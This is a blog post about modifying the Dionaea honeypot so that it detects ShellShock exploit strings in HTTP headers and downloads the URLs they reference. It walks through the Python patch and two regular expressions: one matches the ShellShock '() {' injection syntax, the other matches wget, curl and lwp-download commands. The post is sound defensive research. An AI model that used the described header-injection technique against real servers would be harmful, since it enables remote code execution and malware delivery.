It’s been four months since the Bash ShellShock vulnerability was made public, and for some reason I hadn’t thought of modifying Dionaea to analyse and download any URLs in inbound ShellShock exploits until a week ago! If you’re interested in using Dionaea to download the URLs that in-the-wild ShellShock exploits are trying to download, or if you just like hairy regular expressions, then read on.
I was wading through my web server logs to see if I was getting hit with traffic originally destined for other Internet servers (as mentioned by the Internet Storm Center in one of their podcasts/diary entries), and noticed the familiar ‘() {‘ string in the User-Agent: (and in the occasional Referer:) header (a day after ShellShock was apparently made public — another example of why you should patch as soon as you can!).
I downloaded one of the URLs manually and found a Perl ‘Stealth Bot’. How did I know that it was a stealth bot? It said so in a nice big comment block, presumably just in case we didn’t think that it was stealthy.
So then I thought why not modify the Dionaea (honeypot software) HTTP module to look for the ShellShock exploit and attempt to download any URLs contained therein — that sounded like a good excuse for not doing the vacuuming, so I got started.
The HTTP module in Dionaea is implemented in ./modules/python/scripts/http.py in the source tree. I thought it best to create a new function which can be used to process the inbound HTTP headers, process_headers(). Now, not being overly familiar with Dionaea’s code, figuring out where to put the call to my new function was reminiscent of a game of pin the tail on the donkey.
Seeing (as unlike pin the tail on the donkey, I wasn’t blindfolded) the httpreq class iterate through the headers and set elements in self.headers[], I thought that that seemed like a logical place to call my process_headers() function. That was until I created an incident and had to get access to the connection object to pass it to the incident object.
A more logical spot was where the httpreq object gets created, which is in the http::handle_io_in() (which for some reason just made me think of “it’s get Kirsty in” from the The Parole Officer movie) function. Looking at the handle_io_in() function and seeing what it does also makes this seem like a logical spot to call process_headers(). It is taking the inbound data, locating the end of the headers (eoh = data.find(b’\r\n\r\n’), creating the httpreq object, checking the HTTP method, and processing the request.
I’m going to break this in to two sections at this point. The next section will discuss the Python code, and the section following will explain the regular expression that extracts the URLs from the ShellShock exploit string.
See dionaea-shellshock.diff: A Dionaea Patch to Download ShellShock URLs for my patch. If you want to download it and use it to patch the Dionaea source code, then you should download the base64 encoded version and decode it to ensure that you get a byte-for-byte copy.
The Python Code
If you check my patch, you’ll see that I added a call to my process_headers() function, self.process_headers() (see line 105), after handle_io_in() creates the httpreq object (self.header = httpreq(header)). That’s the only modification to the existing code. The rest is new code. Let’s have a look at it.
The first thing the function does, is obtain a copy of all of the headers returned by the httpreq object’s __init__() method, and then iterate through them using a for loop (lines 36 – 43). The calls to str() (lines 47 – 48) are necessary to convert an array of bytes (which were just ASCII characters) to a string.
Now for the first regular expression (line 53). If there’s one thing I’ve learned about regular expressions over the years, is that it is an awfully good idea to document them! I’ve often gone back to regular expressions (even ones that I’ve written myself) a month or so later and had to spend ages figuring out what they do again. Also, regarding regular expressions, I refuse to use PCREs (most of the PCRE extensions are unnecessary or violate the regularity of the expression).
\(\) {[ ][^}]*;[ ]*}[ ]*;
That is the first of our two regular expressions. This regular expression is used to determine if a header value contains the ShellShock exploit. It is looking for the ‘()’ followed by one (I tried multiple spaces and the exploit doesn’t seem to work with more than one space in here, for some reason) space and a ‘{‘.
We then have (or did have until WordPress got to it — grab a verbatim copy from the patch by decoding the base64 encoded version, as WordPress squeezes white space) a set of braces ([]) containing a space and tab characters — a white-space match (what do you know, we can match white-space without using ‘\s’. Although since I couldn’t actually find what PCRE calls white-space, it may not be the same, but then you can add any other white-space characters to the []s anyway. Plus this method makes it obvious what characters it is matching without you having to try and find what PCREs call ‘whitespace’).
Moving on. The expression then matches zero or more (*) characters ([]) of not (^) ‘}’, followed by a ‘;’. Then zero or more (*) characters [] of white-space (‘ <tab>’) followed by a closing brace ‘}’, more zero or more white-space characters and finally a semi-colon ‘;’.
If this regular expression match succeeds, then we have a ShellShock exploit and we can go on to see if it contains a command to download a URL, which is where the second, and hairier, regular expression comes in (line 60).
(?:wget|curl|lwp-download)(?: |(?: [^;\"]* ))((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
The code then uses a for … in … loop (line 66) to iterate through any URLs matched by the regular expression. The use of the ‘?:’ modifier stops the individual components of the URL from being included in the re match object as separate elements.
Instead the returned matches will be the text that matches the following part of the expression (because it is enclosed in a set of ()s that isn’t modified by a ‘?:’), which is the URL that the exploit is trying to download:
((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
For each of the URLs extracted by the regular expression, we check to see if we’ve already created an incident for the URL (is the URL in the submittedurls array — line 70). This is because a number of exploits were including the same URL in a both a wget and a curl command (presumably edging its bets as it didn’t know whether the host would have wget or curl installed). By checking that the URL isn’t in the submittedurls array, we’ll make sure that we don’t create two download offer incidents for the same URL.
If this is a new URL (for this connection), then we create a Dionaea dionaea.download.offer incident (i = incident(“dionaea.download.offer”) — line 76), link it to the current connection (i.con = self), set the URL (i.url = dlurl), and pass it to Dionaea for processing (i.report()) (lines 81 – 87).
Regular Expression Explanation
(?:wget|curl|lwp-download)(?: |(?: [^;\"]* ))((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
Ok. This one may take some explaining! This regular expression kept growing as I noticed different formats for the wget and curl command lines (even an incorrect one where it looked like one exploit assumed that the ‘-O’ option did the same with curl as it did with wget), and then a URL that was missing the http:// from the beginning.
It might help if I explained some of the regular expression constructs first, then put them all together.
The parenthesis, ‘()’, are used for grouping, similarly to how they are used in maths. They also cause any text matching the contained regular expression to be stored for later retrieval (unless the ‘?:’ modifier is used).
Note that the ‘?:’ modifier is something which I’m usually against using, as it is generally a pointless extension, but in this case it allows us to make subsequent Python code simpler, so we’ll put them in. The ‘?:’ modifier modifies the normal parenthesis behaviour of grouping by not storing the matching text for later retrieval.
This allows us to simplify the Python code because we don’t have to pluck particular elements out of the re match object, which in turn means that we can just use a ‘for … in …‘ construct, as the only elements in there will be the ones that we want.
The ‘|’ character is used to match alternatives. As an example, it is used at the beginning to find either wget, curl, or lwp-download.
‘[]’s match any of the characters contained within, unless the first character therein is a ‘^’ symbol, in which case the []s expression will match any characters not contained within. Within the square brackets, a hyphen (‘-‘) character specifies a range. If the hyphen character is the first (excluding the optional caret (‘^’) character) or last character, then it matches a literal hyphen.
‘*’ means to match zero or more occurrences of the previous character/group.
‘?’ (when it doesn’t immediately follow a ‘(‘ character) means to match zero or one occurrence of the previous character/group. When a ‘?’ immediately follows a ‘(‘ character (which makes the ‘zero or one occurrences of’ meaning nonsensical), it is invoking one of a number of extensions/modifiers.
‘+’ matches at least one occurrence of the previous character/group.
‘{m,n}’ matches m to n occurrences. In this case, I use it as ‘{2,}’ which matches at least two occurrences. This is the same as ‘(expression)(expression)+’, but saves you from having to repeat the expression. The latter method can be used if you find yourself using a regular expression engine that doesn’t support the ‘{m,n}’ construct — sed on Solaris springs to mind, or most things on Solaris for that matter.
Oh yeah, ‘.’ matches any (non-newline) character. ‘\’ escapes characters, that is, it revokes the special regular expression meaning and turns it in to a literal character. For instance, ‘*’ by itself means zero or more occurrences of. If we stick a ‘\’ in front of it, it loses it’s magical powers and will match a literal ‘*’ character.
The same goes for a ‘\’, in that ‘\\’ will match a literal ‘\’. Often it can take some experimenting to determine the number of ‘\’ characters that you need as things like a shell, or Python interpreter, may also have special characters and use ‘\’ to escape them. You’ll often find that one level of escaping gets eaten up by an interpreter (and subsequent levels by any other interpreters that process the expression).
Right. We now know enough to determine what our second regular expression is doing. To make it easier, we’ll break it into parts.
(?:wget|curl|lwp-download)
This looks for a command that will download a URL. In this case wget, curl, and lwp-download. The ‘?:’ just inside the parenthesis means that the match won’t be returned as a separate entity in the re match object.
(?: |(?: [^;\"]* ))
This part matches text in between the command (wget, curl, or lwp-download) and the URL. It says that we want to match either a single space (this probably isn’t as generic as it should be — it should probably be a [ <tab>]+ construct instead, to allow for a varying amount of white-space); or a space, any character except a ‘;’ or ‘”‘, and another space.
I put a bit of thought in to this, as I was trying to do it with one expression rather than the two alternative expressions, but I couldn’t think of a single expression that would prevent the following two problems.
If you leave the single space alternative out, then there will have to be two spaces in a row if there aren’t any options or other text in between the command and the URL (as per the second alternative in that regular expression snippet).
If you attempt to solve this problem by making the first of those spaces (in the second alternative expression) optional, then it will match a command that starts with ‘wget‘, ‘curl‘, or ‘lwp-download‘, like ‘curling’ for instance.
If you make the second of the spaces optional, then the URL could just happen to be part of another string or a non-http/non-ftp URL. Take myhttps://subdirectory.with.dots/file for instance, which could be a reference to the file file in a directory subdirectory.with.dots on an NFS server (yes, NFS references usually just have a single ‘/’ to specify the root directory of the server, but a ‘//’ will work) called myhttps, and given as an option to wget -O as the name of a file to output the downloaded data to. Granted, reasonably unlikely, but still possible.
The rest of the expression is enclosed in parenthesis, and without a ‘?:’. That’s because the rest of the expression is the actual URL which we want to be returned in the re match object. Let’s break it down:
(?:(?:https?|ftp)://)?
This part matches the protocol and ‘://’ part of the URL, and the trailing ‘?’ makes it optional (I saw one exploit that was missing the http:// at the start of the URL). Again, the two ‘?:’ constructs are there so that we don’t get the protocol part (http:// and http, say) returned by itself as a separate element in the re match object.
The ‘?’ after https says that the trailing ‘s’ is optional, that is, match either http or https.
(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+
This matches at least one (+) alphanumeric character ([0-9A-Za-z]) followed by a ‘.’ character (\.), repeated at least twice ({2,}), and followed by at least one alphanumeric character. Note that the ‘.’ has to be escaped, as a ‘.’ in a regular expression will match any non-newline character, but we want to match a literal ‘.’ character.
I’m not as happy with this part as I’d like to be. Since the protocol part of the URL is optional, we need to make sure that we’re not just matching a file name (to save the downloaded URL to) here. This is a problem with commands like ‘wget -O filename.ext missingprotocol.domain.tld’, in that we need the regular expression to match the server name rather than the file name.
The way I’ve stopped it matching a file name is to say that there must be at least two ‘.’ characters in the URL. Obviously this is prone to mismatches, as the output file could be called filename.ext.gz for instance. It also won’t match server names that only have one ‘.’ in them, like csiro.au.
The problem is, I found commands that have the output file name before URL, and some that have the URL before the output file name, so to fix this problem will mean doing checks of options and the like which will make the regular expression somewhat more complicated (especially with options like ‘-O’, which have a different meaning between wget and curl).
(?:/[^ ;\\\"]*)*
Finally, match (but don’t store (?:) as a separate entity) any path that may follow the server name. The path starts with a ‘/’, and consists of a string of characters that aren’t space, ‘;’, ‘\’, nor ‘”‘.
Conclusion
So there you go. Now, ironically, since I’d modified my Dionaea honeypot to capture downloads from ShellShock exploits, I hadn’t seen a ShellShock exploit hit my server! The last one was back on the 19th, so while I’ve tested my Dionaea code by manually connecting to Dionaea on port 80/tcp and sending a HTTP request with a ShellShock exploit in one of the headers, it hasn’t actually been hit by a ShellShock exploit in its natural environment.
I just did another check to find that one hit my web server about forty minutes ago, but for some reason it didn’t target my honeypot, so it still hasn’t been tested by a real in-the-wild ShellShock exploit.